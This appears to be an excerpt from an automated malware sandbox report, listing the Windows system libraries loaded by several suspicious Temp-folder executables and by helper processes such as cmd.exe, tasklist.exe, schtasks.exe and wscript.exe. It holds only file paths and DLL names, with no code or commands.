Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ucrtbase_clr0400.dll
